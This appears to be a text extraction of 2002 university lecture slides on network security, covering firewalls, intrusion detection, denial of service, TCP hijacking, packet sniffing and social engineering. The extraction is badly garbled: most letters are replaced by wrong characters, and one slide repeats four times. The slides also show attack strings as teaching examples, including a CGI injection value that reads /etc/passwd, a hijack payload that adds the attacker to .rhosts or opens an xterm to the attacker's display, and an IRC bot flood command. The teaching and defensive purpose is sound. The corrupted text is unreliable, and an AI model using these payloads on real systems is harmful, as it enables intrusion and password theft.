Network Security

Justin Weisz
jweisz@andrew.cmu.edu

15-441 Networks Fall 2002

A Brief History of the World

15-441 Networks

O er iew

What is security? Why do we need security? Who is vulnerable? Common security attacks and countermeasures
Firewalls !ntrusion "etection #ystems "enial o$ #ervice %ttacks &C' %ttacks 'acket #ni$$in( #ocial 'roblems 3

15-441 Networks

What is !Security"

"ictionary.com says)
1. Freedom $rom risk or dan(er* sa$ety. +. Freedom $rom doubt, an-iety, or $ear* con$idence. .. #omethin( that (ives or assures sa$ety, as)
/ 1. % (rou0 or de0artment o$ 0rivate (uards) Call buildin( security i$ a visitor acts sus0icious. / +. 1easures ado0ted by a (overnment to 0revent es0iona(e, sabota(e, or attack. / .. 1easures ado0ted, as by a business or homeowner, to 0revent a crime such as bur(lary or assault) #ecurity was la- at the $irm2s smaller 0lant.

3etc. 15-441 Networks 4

What is !Security"

"ictionary.com says)
1. Freedom $rom risk or dan(er* sa$ety. +. Freedom $rom doubt, an-iety, or $ear* con$idence. .. #omethin( that (ives or assures sa$ety, as)
/ 1. % (rou0 or de0artment o$ 0rivate (uards) Call buildin( security i$ a visitor acts sus0icious. / +. 1easures ado0ted by a (overnment to 0revent es0iona(e, sabota(e, or attack. / .. 1easures ado0ted, as by a business or homeowner, to 0revent a crime such as bur(lary or assault) #ecurity was la- at the $irm2s smaller 0lant.

3etc. 15-441 Networks 5

What is !Security"

"ictionary.com says)
1. Freedom $rom risk or dan(er* sa$ety. +. Freedom $rom doubt, an-iety, or $ear* con$idence. .. #omethin( that (ives or assures sa$ety, as)
/ 1. % (rou0 or de0artment o$ 0rivate (uards) Call buildin( security i$ a visitor acts sus0icious. / +. 1easures ado0ted by a (overnment to 0revent es0iona(e, sabota(e, or attack. / .. 1easures ado0ted, as by a business or homeowner, to 0revent a crime such as bur(lary or assault) #ecurity was la- at the $irm2s smaller 0lant.

3etc. 15-441 Networks 6

What is !Security"

"ictionary.com says)
1. Freedom $rom risk or dan(er* sa$ety. +. Freedom $rom doubt, an-iety, or $ear* con$idence. .. #omethin( that (ives or assures sa$ety, as)
/ 1. % (rou0 or de0artment o$ 0rivate (uards) Call buildin( security i$ a visitor acts sus0icious. / +. 1easures ado0ted by a (overnment to 0revent es0iona(e, sabota(e, or attack. / .. 1easures ado0ted, as by a business or homeowner, to 0revent a crime such as bur(lary or assault) #ecurity was la- at the $irm2s smaller 0lant.

3etc. 15-441 Networks 7

Why do we #eed security$

'rotect

vital in$ormation while still allowin( access to those who need it

&rade secrets, medical records, etc.

'rovide

authentication and access control $or resources

4-) %F#

5uarantee

availability o$ resources

4-) 6 78s 977.777: reliability;

15-441 Networks 8

Who is ul#era%le$
Financial

institutions and banks !nternet service 0roviders 'harmaceutical com0anies 5overnment and de$ense a(encies Contractors to various (overnment a(encies 1ultinational cor0orations AN&ON' ON (H' N'(WO)*
15-441 Networks 9

+o,,o# security attacks a#d their cou#ter,easures

Findin( a way into the network

Firewalls

4-0loitin( so$tware bu(s, bu$$er over$lows

!ntrusion "etection #ystems

"enial o$ #ervice
!n(ress $ilterin(, !"#

&C' hijackin(
!'#ec

'acket sni$$in(
4ncry0tion 9##<, ##=, <&&'#;

#ocial 0roblems
4ducation

15-441 Networks

10

Firewalls
>asic

0roblem many network a00lications and 0rotocols have security 0roblems that are $i-ed over time
"i$$icult $or users to kee0 u0 with chan(es and kee0 host secure #olution
/ %dministrators limit access to end hosts by usin( a $irewall / Firewall is ke0t u0?to?date by administrators

15-441 Networks

11

Firewalls
%

$irewall is like a castle with a drawbrid(e

@nly one 0oint o$ access into the network &his can be (ood or bad
Can

be hardware or so$tware

4-. #ome routers come with $irewall $unctionality i0$w, i0chains, 0$ on Ani- systems, Windows B' and 1ac @# B have built in $irewalls

15-441 Networks

12

Firewalls
!nternet
Firewall 15-441 Networks

"1C
Web server, email server, web proxy, etc

Firewall

!ntranet
13

Firewalls

Ased to $ilter 0ackets based on a combination o$ $eatures

&hese are called 0acket $ilterin( $irewalls
/ &here are other ty0es too, but they will not be discussed

4-. "ro0 0ackets with destination 0ort o$ +. 9&elnet; Can use any combination o$ !'DA"'D&C' header in$ormation man ipfw on uni-EF $or much more detail

>ut why don8t we just turn &elnet o$$?

14

15-441 Networks

Firewalls
<ere

is what a com0uter with a de$ault Windows B' install looks like)

135/tcp open loc-srv 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1025/tcp open NFS-or- S 33!9/tcp open ms-term-serv 5000/tcp open "#n#

1i(ht

need some o$ these services, or mi(ht not be able to control all the machines on the network
15

15-441 Networks

Firewalls
What

does a $irewall rule look like? i0$w

"e0ends on the $irewall used

4-am0le) @ther
/sbin/ipfw add den$ tcp from crac%er&evil&or' to wolf&tambov&s( telnet

e-am0les) WinB' 1ac @# B have built in and third 0arty $irewalls

"i$$erent (ra0hical user inter$aces Garyin( amounts o$ com0le-ity and 0ower

15-441 Networks

16

-#trusio# .etectio#
Ased

to monitor $or Hsus0icious activityI on a network

Can 0rotect a(ainst known so$tware e-0loits, like bu$$er over$lows

@0en

#ource !"#) #nort, www.snort.or(

15-441 Networks

17

-#trusio# .etectio#

Ases Hintrusion si(naturesI

Well known 0atterns o$ behavior
/ 'in( swee0s, 0ort scannin(, web server inde-in(, @# $in(er0rintin(, "o# attem0ts, etc.

4-am0le
!J!B vulnerability in webdist&c'i Can make a rule to dro0 0ackets containin( the line
) */c'i-bin/webdist&c'i+distloc,+-cat.20/etc/passwd/

<owever, !"# is only use$ul i$ contin(ency 0lans are in 0lace to curb attacks as they are occurrin(
18

15-441 Networks

/i#or .etour0
#ay

we (ot the DetcD0asswd $ile $rom the !J!B server What can we do with it?

15-441 Networks

19

.ictio#ary Attack

We can run a dictionary attack on the 0asswords

&he 0asswords in DetcD0asswd are encry0ted with the cry0t9.; $unction 9one?way hash; Can take a dictionary o$ words, cry0t9; them all, and com0are with the hashed 0asswords

&his is why your 0asswords should be meanin(less random junkK

For e-am0le, Hsd$oL.7$I is a (ood 0assword
/ &hat is not my andrew 0assword / 'lease don8t try it either

15-441 Networks

20

.e#ial of Ser ice

'ur0ose)

1ake a network service unusable, usually by overloadin( the server or network 1any di$$erent kinds o$ "o# attacks
#MN $loodin( #1AJF "istributed attacks 1ini Case #tudy) Code?Jed

15-441 Networks

21

.e#ial of Ser ice

#MN $loodin( attack #end #MN 0ackets with bo(us source address
Why?

#erver res0onds with #MN %CO and kee0s state about &C' hal$?o0en connection
4ventually, server memory is e-hausted with this state

#olution) use H#MN cookiesI

!n res0onse to a #MN, create a s0ecial HcookieI $or the connection, and $or(et everythin( else &hen, can recreate the $or(otten in$ormation when the %CO comes in $rom a le(itimate connection

15-441 Networks

22

.e#ial of Ser ice

15-441 Networks

23

.e#ial of Ser ice

#1AJF

#ource !' address o$ a broadcast 0in( is $or(ed =ar(e number o$ machines res0ond back to victim, overloadin( it

15-441 Networks

24

.e#ial of Ser ice

!C1' echo 9s0oo$ed source address o$ victim; #ent to !' broadcast address !C1' echo re0ly

!nternet

'er0etrator

Gictim

15-441 Networks

25

.e#ial of Ser ice

"istributed "enial o$ #ervice

#ame techniPues as re(ular "o#, but on a much lar(er scale 4-am0le) #ubF#erver &rojan and !JC bots
/ !n$ect a lar(e number o$ machines with a HzombieI 0ro(ram / Combie 0ro(ram lo(s into an !JC channel and awaits commands / 4-am0le)
>ot command) K0E +QF.F1.7+.17. Jesult) runs 0in(.e-e +QF.F1.7+.17. ?l R66QQ ?n 1QQQQ #ends 1Q,QQQ REk 0ackets to the host 9R661>K;

/ Jead more at) htt0)DD(rc.comDdosD(rcdos.htm

15-441 Networks

26

.e#ial of Ser ice

1ini

Case #tudy CodeJed

July 17, +QQ1) over .67,QQQ com0uters in$ected with Code?Jed in less than 1E hours Ased a recently known bu$$er e-0loit in 1icroso$t !!# "ama(es estimated in e-cess o$ S+.R billion

15-441 Networks

27

.e#ial of Ser ice

Why

is this under the "enial o$ #ervice cate(ory?

CodeJed launched a ""@# attack a(ainst www1.whitehouse.(ov $rom the +Qth to the +Lth o$ every monthK #0ent the rest o$ its time in$ectin( other hosts

15-441 Networks

28

.e#ial of Ser ice

<ow

can we 0rotect ourselves?

!n(ress $ilterin(
/ !$ the source !' o$ a 0acket comes in on an inter$ace which does not have a route to that 0acket, then dro0 it / JFC ++RF has more in$ormation about this

#tay on to0 o$ C4J& advisories and the latest security 0atches

/ % $i- $or the !!# bu$$er over$low was released si1tee# days %efore CodeJed had been de0loyedK 15-441 Networks 29

(+2 Attacks
Jecall

how !' works3

4nd hosts create !' 0ackets and routers 0rocess them 0urely based on destination address alone
'roblem)

4nd hosts may lie about other $ields which do not a$$ect delivery
#ource address host may trick destination into believin( that the 0acket is $rom a trusted source
/ 4s0ecially a00lications which use !' addresses as a sim0le authentication method / #olution use better authentication methods

15-441 Networks

30

(+2 Attacks
&C'

connections have associated state what i$ an attacker learns these

#tartin( sePuence numbers, 0ort numbers

'roblem

values?
'ort numbers are sometimes well known to be(in with 9e-. <&&' uses 0ort LQ; #ePuence numbers are sometimes chosen in very 0redictable ways
15-441 Networks 31

(+2 Attacks
!$

an attacker learns the associated &C' state $or the connection, then the connection can be hi3ackedK %ttacker can insert malicious data into the &C' stream, and the reci0ient will believe it came $rom the ori(inal source
4-. !nstead o$ downloadin( and runnin( new 0ro(ram, you download a virus and e-ecute it
15-441 Networks 32

(+2 Attacks
#ay

hello to %lice, >ob and 1r. >i( 4ars

15-441 Networks

33

(+2 Attacks
%lice

and >ob have an established &C' connection

15-441 Networks

34

(+2 Attacks
1r.

>i( 4ars lies on the 0ath between %lice and >ob on the network
<e can interce0t all o$ their 0ackets

15-441 Networks

35

(+2 Attacks
First,

1r. >i( 4ars must dro0 all o$ %lice8s 0ackets since they must not be delivered to >ob 9why?;

Packets The Void

15-441 Networks

36

(+2 Attacks
&hen,

1r. >i( 4ars sends his malicious 0acket with the ne-t !#N 9sni$$ed $rom the network;

ISN, SRC=Alice

15-441 Networks

37

(+2 Attacks
What

i$ 1r. >i( 4ars is unable to sni$$ the 0ackets between %lice and >ob?
Can just "o# %lice instead o$ dro00in( her 0ackets Can just send (uesses o$ what the !#N is until it is acce0ted

<ow

do you know when the !#N is acce0ted?

1itnick) 0ayload is Hadd sel$ to .rhostsI @r, H-term ?dis0lay 1r>i(4ars)QI

15-441 Networks 38

(+2 Attacks
Why

are these ty0es o$ &C' attacks so dan(erous?

Web server

Trusting web client

15-441 Networks

Malicious user

39

(+2 Attacks
<ow

do we 0revent this? !'#ec

'rovides source authentication, so 1r. >i( 4ars cannot 0retend to be %lice 4ncry0ts data be$ore trans0ort, so 1r. >i( 4ars cannot talk to >ob without knowin( what the session key is

15-441 Networks

40

Fi e /i#ute Break
For

your enjoyment, here is somethin( com0letely unrelated to this lecture)

15-441 Networks

41

2acket S#iffi#4
Jecall

how 4thernet works 3 When someone wants to send a 0acket to some else 3 &hey 0ut the bits on the wire with the destination 1%C address 3 %nd remember that other hosts are listenin( on the wire to detect $or collisions 3 !t couldn8t (et any easier to $i(ure out what data is bein( transmitted over the networkK
15-441 Networks 42

2acket S#iffi#4
&his

works $or wireless tooK !n $act, it works $or any broadcast?based medium

15-441 Networks

43

2acket S#iffi#4
What

kinds o$ data can we (et? %sked another way, what kind o$ in$ormation would be most use$ul to a malicious user? %nswer) %nythin( in 0lain te-t
'asswords are the most 0o0ular

15-441 Networks

44

2acket S#iffi#4

<ow can we 0rotect ourselves? ##<, not &elnet

1any 0eo0le at C1A still use &elnet and send their 0assword in the clear 9use 'u&&M insteadK; Now that ! have told you this, 0lease do not e-0loit this in$ormation 'acket sni$$in( is, by the way, 0rohibited by Com0utin( #ervices

<&&' over ##=

4s0ecially when makin( 0urchases with credit cardsK

#F&', not F&'

Anless you really don8t care about the 0assword or data Can also use OerbF&' 9download $rom 1y%ndrew;

!'#ec
'rovides network?layer con$identiality

15-441 Networks

45

Social 2ro%le,s
'eo0le

can be just as dan(erous as un0rotected com0uter systems

'eo0le can be lied to, mani0ulated, bribed, threatened, harmed, tortured, etc. to (ive u0 valuable in$ormation 1ost humans will breakdown once they are at the HharmedI sta(e, unless they have been s0ecially trained
/ &hink (overnment here3

15-441 Networks

46

Social 2ro%le,s
Fun

4-am0le 1)

H<i, !8m your %& & re0, !8m stuck on a 0ole. ! need you to 0unch a bunch o$ buttons $or meI

15-441 Networks

47

Social 2ro%le,s
Fun

4-am0le +)

#omeone calls you in the middle o$ the ni(ht

/ H<ave you been callin( 4(y0t $or the last si- hours?I / HNoI / HWell, we have a call that8s actually active ri(ht now, it8s on your callin( card and it8s to 4(y0t and as a matter o$ $act, you8ve (ot about S+QQQ worth o$ char(es on your card and 3 read o$$ your %& & card number and '!N and then !8ll (et rid o$ the char(e $or youI 15-441 Networks 48

Social 2ro%le,s
Fun

4-am0le .)

Who saw @$$ice #0ace? !n the movie, the three dis(runtled em0loyees installed a money?stealin( worm onto the com0anies systems &hey did this $rom i#side the com0any, where they had full access to the com0anies systems
/ What security techniPues can we use to 0revent this ty0e o$ access? 15-441 Networks 49

Social 2ro%le,s

&here aren8t always solutions to all o$ these 0roblems

<umans will continue to be tricked into (ivin( out in$ormation they shouldn8t 4ducatin( them may hel0 a little here, but, de0endin( on how bad you want the in$ormation, there are a lot o$ bad thin(s you can do to (et it

#o, the best that can be done is to im0lement a wide variety o$ solutions and more closely monitor who has access to what network resources and in$ormation
>ut, this solution is still not 0er$ect

15-441 Networks

50

+o#clusio#s
&he

!nternet works only because we im0licitly trust one another !t is very easy to e-0loit this trust &he same holds true $or so$tware !t is im0ortant to stay on to0 o$ the latest C4J& security advisories to know how to 0atch any security holes

15-441 Networks

51

Security related 5)6s

htt0)DDwww.robert(raham

.comD0ubsDnetwork?intrusion?detection.html htt0)DDonline.security$ocus.comDin$ocusD16+F htt0)DDwww.snort.or(D htt0)DDwww.cert.or(D htt0)DDwww.nma0.or(D htt0)DD(rc.comDdosD(rcdos.htm htt0)DDlcamtu$.coredum0.c-Dnewtc0D

15-441 Networks 52